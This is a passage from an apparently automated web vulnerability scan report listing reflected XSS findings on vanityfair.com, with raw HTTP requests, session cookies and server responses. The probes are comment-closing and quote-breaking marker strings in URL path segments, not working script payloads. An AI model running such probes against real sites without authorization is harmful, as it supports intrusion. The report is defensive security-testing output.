Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:22 GMT
Date: Mon, 29 Nov 2010 16:49:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44604


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/daily/arta562a';4d70b756bee',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.",
keywords : "Vanity
...[SNIP]...

1.209. http://www.vanityfair.com/online/daily/art [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/art

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload d8789-->b5e6fcae1be was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/daily/artd8789-->b5e6fcae1be HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:24 GMT
Date: Mon, 29 Nov 2010 16:49:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47184


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
[Cause bug: com.amg.condenet.commons.exceptions.ApplicationBug:
-:[1386600173]:- Thread id: 39. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/artd8789-->b5e6fcae1be/?proxyuri=online%2Fdaily%2Fartd8789--%3Eb5e6fcae1be%2F':
escaped absolute path not valid.
->
...[SNIP]...

1.210. http://www.vanityfair.com/online/daily/books [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/books

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 884ea-->5885a371fc9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/daily/books884ea-->5885a371fc9 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:28 GMT
Date: Mon, 29 Nov 2010 16:49:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47204


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
Cause bug: com.amg.condenet.commons.exceptions.ApplicationBug:
-:[1422440510]:- Thread id: 39. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/books884ea-->5885a371fc9/?proxyuri=online%2Fdaily%2Fbooks884ea--%3E5885a371fc9%2F':
escaped absolute path not valid.
->
...[SNIP]...

1.211. http://www.vanityfair.com/online/daily/books [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/books

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10016'%3b322ae6fcf7a was submitted in the REST URL parameter 3. This input was echoed as 10016';322ae6fcf7a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/daily/books10016'%3b322ae6fcf7a HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:25 GMT
Date: Mon, 29 Nov 2010 16:49:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44608


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/daily/books10016';322ae6fcf7a',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.",
keywords : "Vanity
...[SNIP]...

1.212. http://www.vanityfair.com/online/daily/gifts [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/gifts

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload b90dd-->0cfc0469b67 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/daily/giftsb90dd-->0cfc0469b67 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:22 GMT
Date: Mon, 29 Nov 2010 16:49:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47204


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
[Cause bug: com.amg.condenet.commons.exceptions.ApplicationBug:
-:[122776942]:- Thread id: 39. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/giftsb90dd-->0cfc0469b67/?proxyuri=online%2Fdaily%2Fgiftsb90dd--%3E0cfc0469b67%2F':
escaped absolute path not valid.
->
...[SNIP]...

1.213. http://www.vanityfair.com/online/daily/gifts [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/gifts

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f77cf'%3b54b70297d3f was submitted in the REST URL parameter 3. This input was echoed as f77cf';54b70297d3f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/daily/giftsf77cf'%3b54b70297d3f HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:20 GMT
Date: Mon, 29 Nov 2010 16:49:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44606


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/daily/giftsf77cf';54b70297d3f',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.",
keywords : "Vanity
...[SNIP]...

1.214. http://www.vanityfair.com/online/daily/gossip-pack [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/gossip-pack

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 865c7-->b80412361fb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/daily/gossip-pack865c7-->b80412361fb HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:25 GMT
Date: Mon, 29 Nov 2010 16:49:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47270


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
bug: com.amg.condenet.commons.exceptions.ApplicationBug:
-:[381077282]:- Thread id: 40. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/gossip-pack865c7-->b80412361fb/?proxyuri=online%2Fdaily%2Fgossip-pack865c7--%3Eb80412361fb%2F':
escaped absolute path not valid.
->
...[SNIP]...

1.215. http://www.vanityfair.com/online/daily/gossip-pack [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/gossip-pack

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29aaa'%3b1827f640979 was submitted in the REST URL parameter 3. This input was echoed as 29aaa';1827f640979 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/daily/gossip-pack29aaa'%3b1827f640979 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:23 GMT
Date: Mon, 29 Nov 2010 16:49:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44614


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/daily/gossip-pack29aaa';1827f640979',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.",
keywords : "Vanity
...[SNIP]...

1.216. http://www.vanityfair.com/online/oscars/2010/10/irvin-kershner.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/oscars/2010/10/irvin-kershner.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0502'%3b53abf324fa8 was submitted in the REST URL parameter 3. This input was echoed as e0502';53abf324fa8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/oscars/2010e0502'%3b53abf324fa8/10/irvin-kershner.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:26 GMT
Date: Mon, 29 Nov 2010 16:49:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44630


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/oscars/2010e0502';53abf324fa8/10/irvin-kershner.html',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.",

...[SNIP]...

1.217. http://www.vanityfair.com/online/oscars/2010/10/irvin-kershner.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/oscars/2010/10/irvin-kershner.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1003'%3bea1c7fe5ea5 was submitted in the REST URL parameter 4. This input was echoed as e1003';ea1c7fe5ea5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/oscars/2010/10e1003'%3bea1c7fe5ea5/irvin-kershner.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:40 GMT
Date: Mon, 29 Nov 2010 16:49:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44628


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/oscars/2010/10e1003';ea1c7fe5ea5/irvin-kershner.html',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.",
ke
...[SNIP]...

1.218. http://www.vanityfair.com/online/oscars/2010/10/irvin-kershner.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/oscars/2010/10/irvin-kershner.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80e77'%3bad0e991cf0a was submitted in the REST URL parameter 5. This input was echoed as 80e77';ad0e991cf0a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/oscars/2010/10/irvin-kershner.html80e77'%3bad0e991cf0a HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:55 GMT
Date: Mon, 29 Nov 2010 16:49:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44628


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/oscars/2010/10/irvin-kershner.html80e77';ad0e991cf0a',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.",
keywords : "Vanity
...[SNIP]...

1.219. http://www.vanityfair.com/online/oscars/2010/11/is-tangled-safe-for-adults-who-are-allergic-to-musicals.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/oscars/2010/11/is-tangled-safe-for-adults-who-are-allergic-to-musicals.html

Issue detail

